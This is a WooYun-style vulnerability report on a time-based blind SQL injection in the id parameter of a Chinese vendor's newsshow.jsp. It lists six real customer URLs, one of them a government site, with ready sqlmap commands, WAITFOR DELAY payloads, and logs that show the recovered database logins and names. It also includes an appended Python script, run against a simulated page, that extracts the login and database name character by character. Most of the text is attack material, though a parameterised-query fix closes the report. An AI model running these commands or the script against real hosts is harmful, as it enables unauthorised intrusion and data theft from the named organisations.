
Vulnerability summary (followers: 24)

Defect ID: wooyun-2014-083466

Title: Generic blind SQL injection vulnerability in a certain system

Vendor: 北京安泰伟奥信息技术有限公司

Author: 路人甲

Submitted: 2014-11-18 18:08

Fix time: 2015-02-16 18:10

Disclosed: 2015-02-16 18:10

Type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2014-11-18: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-02-16: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

The news page /Website/newsshow.jsp shipped with this vendor's product passes its id parameter straight into a Sybase query. The result is a time-based blind SQL injection (payload: WAITFOR DELAY '0:0:5'--) that reproduces on each of the six customer deployments listed below, so it is a generic flaw in the product rather than a single site's misconfiguration.

Detailed description:

Vendor involved: 北京安泰伟奥信息技术有限公司
Affected scope: see the typical customer list on the vendor's website, http://www.atwasoft.com/p/views/customer.html
Injection point: the id parameter (GET)
URLs with SQL injection:
1、hzsgjj.com/Website/newsshow.jsp?id=125
sqlmap.py -u "hzsgjj.com/Website/newsshow.jsp?id=125" -p "id" --dbs --current-user --current-db

[screenshot: 2.png]


2、http://www.xngjj.gov.cn/Website/newsshow.jsp?id=535
sqlmap.py -u "http://www.xngjj.gov.cn/Website/newsshow.jsp?id=535" -p "id" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 104 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=535 WAITFOR DELAY '0:0:5'--
---
[22:36:39] [INFO] testing MySQL
[22:36:39] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[22:36:40] [WARNING] the back-end DBMS is not MySQL
[22:36:40] [INFO] testing Oracle
[22:36:40] [WARNING] the back-end DBMS is not Oracle
[22:36:40] [INFO] testing PostgreSQL
[22:36:40] [WARNING] the back-end DBMS is not PostgreSQL
[22:36:40] [INFO] testing Microsoft SQL Server
[22:36:41] [WARNING] the back-end DBMS is not Microsoft SQL Server
[22:36:41] [INFO] testing SQLite
[22:36:41] [WARNING] the back-end DBMS is not SQLite
[22:36:41] [INFO] testing Microsoft Access
[22:36:42] [WARNING] the back-end DBMS is not Microsoft Access
[22:36:42] [INFO] testing Firebird
[22:36:42] [WARNING] the back-end DBMS is not Firebird
[22:36:42] [INFO] testing SAP MaxDB
[22:36:42] [WARNING] the back-end DBMS is not SAP MaxDB
[22:36:42] [INFO] testing Sybase
[22:36:48] [INFO] confirming Sybase
[22:36:53] [INFO] the back-end DBMS is Sybase
web application technology: JSP
back-end DBMS: Sybase
[22:36:53] [INFO] fetching current user
[22:36:53] [INFO] retrieved:
[22:36:59] [INFO] adjusting time delay to 2 seconds due to good response times
jtpsoftadmin
current user: 'jtpsoftadmin'
[22:39:25] [INFO] fetching current database
[22:39:25] [INFO] retrieved: web
current database: 'web'
[22:40:02] [INFO] fetching database names
[22:40:02] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 249 times
Traceback (most recent call last):
File "thirdparty\ansistrm\ansistrm.pyo", line 50, in emit
File "lib\core\convert.pyo", line 120, in stdoutencode
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc5 in position 560: ordinal not in range(128)
Logged from file _sqlmap.pyo, line 101
Traceback (most recent call last):
File "_sqlmap.pyo", line 72, in main
File "lib\controller\controller.pyo", line 570, in start
File "lib\controller\action.pyo", line 89, in action
File "plugins\dbms\sybase\enumeration.pyo", line 98, in getDbs
AttributeError: SybaseMap instance has no attribute '_Enumeration__pivotDumpTable'
3、http://www.tygjj.com/Website/newsshow.jsp?id=1499
sqlmap.py -u "http://www.tygjj.com/Website/newsshow.jsp?id=1499" -p "id" --dbs --current-user --current-db

[screenshot: 3.png]


4、http://www.sysgjj.com/Website/newsshow.jsp?id=713
sqlmap.py -u "http://www.sysgjj.com/Website/newsshow.jsp?id=713" -p "id" --dbs --current-user --current-db

[screenshot: 4.png]


5、http://www.fcggjj.com/Website/newsshow.jsp?id=50
sqlmap.py -u "http://www.fcggjj.com/Website/newsshow.jsp?id=50" -p "id" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 104 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=50 WAITFOR DELAY '0:0:5'--
---
[22:49:51] [INFO] testing MySQL
[22:49:51] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[22:49:55] [WARNING] the back-end DBMS is not MySQL
[22:49:55] [INFO] testing Oracle
[22:50:00] [WARNING] the back-end DBMS is not Oracle
[22:50:00] [INFO] testing PostgreSQL
[22:50:05] [WARNING] the back-end DBMS is not PostgreSQL
[22:50:05] [INFO] testing Microsoft SQL Server
[22:50:11] [WARNING] the back-end DBMS is not Microsoft SQL Server
[22:50:11] [INFO] testing SQLite
[22:50:16] [WARNING] the back-end DBMS is not SQLite
[22:50:16] [INFO] testing Microsoft Access
[22:50:21] [WARNING] the back-end DBMS is not Microsoft Access
[22:50:21] [INFO] testing Firebird
[22:50:26] [WARNING] the back-end DBMS is not Firebird
[22:50:26] [INFO] testing SAP MaxDB
[22:50:31] [WARNING] the back-end DBMS is not SAP MaxDB
[22:50:31] [INFO] testing Sybase
[22:50:46] [INFO] confirming Sybase
[22:51:02] [INFO] the back-end DBMS is Sybase
web application technology: JSP
back-end DBMS: Sybase
[22:51:02] [INFO] fetching current user
[22:51:02] [INFO] retrieved:
[22:51:17] [INFO] adjusting time delay to 3 seconds due to good response times
jtpsoftadmin
current user: 'jtpsoftadmin'
[23:05:22] [INFO] fetching current database
[23:05:22] [INFO] retrieved: wz
current database: 'wz'
[23:08:25] [INFO] fetching database names
[23:08:25] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 241 times
Traceback (most recent call last):
File "thirdparty\ansistrm\ansistrm.pyo", line 50, in emit
File "lib\core\convert.pyo", line 120, in stdoutencode
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc5 in position 560: ordinal not in range(128)
Logged from file _sqlmap.pyo, line 101
Traceback (most recent call last):
File "_sqlmap.pyo", line 72, in main
File "lib\controller\controller.pyo", line 570, in start
File "lib\controller\action.pyo", line 89, in action
File "plugins\dbms\sybase\enumeration.pyo", line 98, in getDbs
AttributeError: SybaseMap instance has no attribute '_Enumeration__pivotDumpTable'
6、http://www.lbszfgjj.org/Website/newsshow.jsp?id=31
sqlmap.py -u "http://www.lbszfgjj.org/Website/newsshow.jsp?id=31" -p "id" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 104 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=31 WAITFOR DELAY '0:0:5'--
---
[07:36:19] [INFO] testing MySQL
[07:36:19] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[07:36:24] [WARNING] the back-end DBMS is not MySQL
[07:36:24] [INFO] testing Oracle
[07:36:29] [WARNING] the back-end DBMS is not Oracle
[07:36:29] [INFO] testing PostgreSQL
[07:36:33] [WARNING] the back-end DBMS is not PostgreSQL
[07:36:33] [INFO] testing Microsoft SQL Server
[07:36:38] [WARNING] the back-end DBMS is not Microsoft SQL Server
[07:36:38] [INFO] testing SQLite
[07:36:43] [WARNING] the back-end DBMS is not SQLite
[07:36:43] [INFO] testing Microsoft Access
[07:36:48] [WARNING] the back-end DBMS is not Microsoft Access
[07:36:48] [INFO] testing Firebird
[07:36:53] [WARNING] the back-end DBMS is not Firebird
[07:36:53] [INFO] testing SAP MaxDB
[07:36:57] [WARNING] the back-end DBMS is not SAP MaxDB
[07:36:57] [INFO] testing Sybase
[07:37:07] [INFO] confirming Sybase
[07:37:17] [INFO] the back-end DBMS is Sybase
web application technology: JSP
back-end DBMS: Sybase
[07:37:17] [INFO] fetching current user
[07:37:17] [INFO] retrieved:
[07:37:27] [INFO] adjusting time delay to 4 seconds due to good response times
[07:38:08] [INFO] adjusting time delay to 3 seconds due to good response times
[07:38:14] [ERROR] invalid character detected. retrying..
[07:38:14] [WARNING] increasing time delay to 4 seconds
jtpadmin
current user: 'jtpadmin'
[07:46:14] [INFO] fetching current database
[07:46:14] [INFO] retrieved: gjjweb
current database: 'gjjweb'
[07:52:14] [INFO] fetching database names
[07:52:14] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 249 times
Traceback (most recent call last):
File "thirdparty\ansistrm\ansistrm.pyo", line 50, in emit
File "lib\core\convert.pyo", line 120, in stdoutencode
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc5 in position 560: ordinal not in range(128)
Logged from file _sqlmap.pyo, line 101
Traceback (most recent call last):
File "_sqlmap.pyo", line 72, in main
File "lib\controller\controller.pyo", line 570, in start
File "lib\controller\action.pyo", line 89, in action
File "plugins\dbms\sybase\enumeration.pyo", line 98, in getDbs
AttributeError: SybaseMap instance has no attribute '_Enumeration__pivotDumpTable'
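Two things in the sqlmap logs above deserve a closer look. First, the --dbs step aborted inside sqlmap itself (the AttributeError in plugins\dbms\sybase\enumeration.pyo, and a console UnicodeDecodeError before it), not because of anything the target did: the current login and database were recovered through the timing channel, the database list simply was never attempted. Second, the whole exploitation rests on one primitive, a statement appended to the id value that makes the server sleep only when a condition is true. The script below is an added example, not code from the report or from the vendor, that replays that primitive offline: the HTTP target is replaced by a simulated newsshow.jsp (simulated_newsshow) that concatenates id into a T-SQL batch and honours WAITFOR DELAY; its login and database names (jtpsoftadmin, web) are constructed stand-ins chosen to mirror the log output, and the delay is shortened from 5 s to 50 ms. It runs the same detection probe sqlmap reported (WAITFOR DELAY '0:0:5'-- after the id) and then recovers suser_name() and db_name() one character at a time by binary search on the ASCII value, which is how --current-user and --current-db work for a time-based blind injection.

```python
"""Time-based blind SQL injection against newsshow.jsp?id=, replayed offline.

Added example, not code from the original report or the vendor. The network
target is replaced by a simulated Sybase-backed page; the probing logic is the
time-based technique sqlmap used in the report.
"""
import re
import time
import urllib.parse

# Constructed stand-ins for the target's database state (assumption, not data
# taken from any real host); chosen to mirror the values in the report's logs.
SIM_LOGIN = "jtpsoftadmin"
SIM_DB = "web"
DELAY = 0.05            # seconds the simulated WAITFOR DELAY sleeps; the report used 5 s
THRESHOLD = DELAY / 2   # a response slower than this counts as "delayed"

# Recognises the conditional-delay payload built by extract() below.
_COND = re.compile(
    r"IF\s*\(\s*ASCII\(SUBSTRING\((suser_name|db_name)\(\),(\d+),1\)\)\s*>\s*(\d+)\s*\)"
    r"\s*WAITFOR\s+DELAY", re.I)
_PLAIN = re.compile(r"WAITFOR\s+DELAY", re.I)


def simulated_newsshow(query_string: str) -> str:
    """Stand-in for /Website/newsshow.jsp: the id parameter is concatenated into a
    T-SQL batch (the flaw) and just enough of the batch is 'executed' to reproduce
    the timing side channel."""
    id_value = urllib.parse.parse_qs(query_string).get("id", [""])[0]
    sql = "SELECT * FROM news WHERE id=" + id_value   # string concatenation, no binding
    m = _COND.search(sql)
    if m:
        func, pos, k = m.group(1).lower(), int(m.group(2)), int(m.group(3))
        src = SIM_LOGIN if func == "suser_name" else SIM_DB
        # SUBSTRING past the end yields '' and ASCII('') is NULL, so the
        # comparison is never true; ord("\0") == 0 models that.
        ch = src[pos - 1] if pos <= len(src) else "\0"
        if ord(ch) > k:
            time.sleep(DELAY)
    elif _PLAIN.search(sql):
        time.sleep(DELAY)
    return "<html>news page</html>"


def timed(query_string: str, send=simulated_newsshow) -> float:
    """Round-trip time of one request; `send` is the transport (simulated here)."""
    t0 = time.perf_counter()
    send(query_string)
    return time.perf_counter() - t0


def is_time_injectable(base_id: str, send=simulated_newsshow) -> bool:
    """Detection, as in the report's sqlmap run: an unconditional WAITFOR DELAY
    appended to the id value must take measurably longer than the benign request."""
    benign = timed(urllib.parse.urlencode({"id": base_id}), send)
    probe = timed(urllib.parse.urlencode({"id": f"{base_id} WAITFOR DELAY '0:0:5'--"}), send)
    return probe - benign > THRESHOLD


def extract(base_id: str, func: str, send=simulated_newsshow, max_len: int = 64) -> str:
    """Recover func() (suser_name or db_name) one character at a time with a binary
    search over the ASCII value: 7 timed requests per character."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            payload = (f"{base_id} IF (ASCII(SUBSTRING({func}(),{pos},1))>{mid}) "
                       f"WAITFOR DELAY '0:0:5'--")
            if timed(urllib.parse.urlencode({"id": payload}), send) > THRESHOLD:
                lo = mid + 1          # delayed, so ASCII value > mid
            else:
                hi = mid
        if lo == 0:                   # no character at this position: string ended
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    print("injectable:", is_time_injectable("535"))
    print("current user:", extract("535", "suser_name"))
    print("current database:", extract("535", "db_name"))
```

Against a real host the `send` argument would be an HTTP GET of /Website/newsshow.jsp with the given query string, and the threshold should be set from several benign samples rather than a single one, which is what the "adjusting time delay" lines in the logs above are doing.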

Proof of vulnerability:

Proven; see the sqlmap output and screenshots above (the current user and current database were recovered through the time-based channel on the hosts shown).

Fix:

Do not rely on filtering special characters. The id parameter is a numeric record identifier, so the page should parse it as an integer, reject anything else, and bind it through a JDBC PreparedStatement placeholder instead of concatenating it into the SQL string; character blacklists are routinely bypassed, and the payload used here needs nothing more than a space, a quote and the -- comment marker. In addition, the database logins recovered (jtpsoftadmin, jtpadmin) should be reviewed for excess privilege and the web application given a least-privilege account.

Copyright notice: when reposting, please credit 路人甲@乌云


Vulnerability response

Vendor response:

Vendor could not be contacted, or the vendor actively declined